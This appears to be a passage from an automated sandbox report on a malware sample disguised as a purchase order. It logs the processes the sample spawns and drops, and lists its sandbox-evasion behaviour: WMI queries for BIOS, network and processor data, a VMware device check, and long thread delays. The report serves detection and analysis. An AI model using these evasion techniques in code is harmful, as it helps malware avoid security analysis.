                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5127Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2128Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4329Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2904Jump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWindow / User API: threadDelayed 3085
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWindow / User API: threadDelayed 6729
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1332Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep count: 4329 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep count: 2904 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep count: 52 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1320Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6112Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6220Thread sleep count: 3085 > 30
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6220Thread sleep count: 6729 > 30
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
